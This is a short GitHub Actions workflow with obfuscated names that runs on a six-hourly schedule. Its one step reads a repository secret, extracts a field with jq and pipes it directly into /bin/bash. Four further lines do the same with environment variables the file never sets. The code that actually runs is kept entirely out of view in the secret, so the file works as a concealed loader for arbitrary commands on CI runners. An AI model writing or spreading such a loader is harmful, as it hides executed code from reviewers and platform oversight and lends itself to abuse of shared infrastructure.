name: xuezhongpaof
on:
  workflow_dispatch:
  schedule:
    - cron: '43 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuezhongpaof
        env:
          grqt275: ${{ secrets.grqt275 }}
        run: |
          echo $grqt275 | jq -r .grvkp7577 | /bin/bash
          echo $utj877 | jq -r .ymk9 | /bin/bash
          echo $vh3 | jq -r .nbpv24 | /bin/bash
          echo $bah3 | jq -r .cb1258 | /bin/bash
          echo $yeh78 | jq -r .yu96147 | /bin/bash

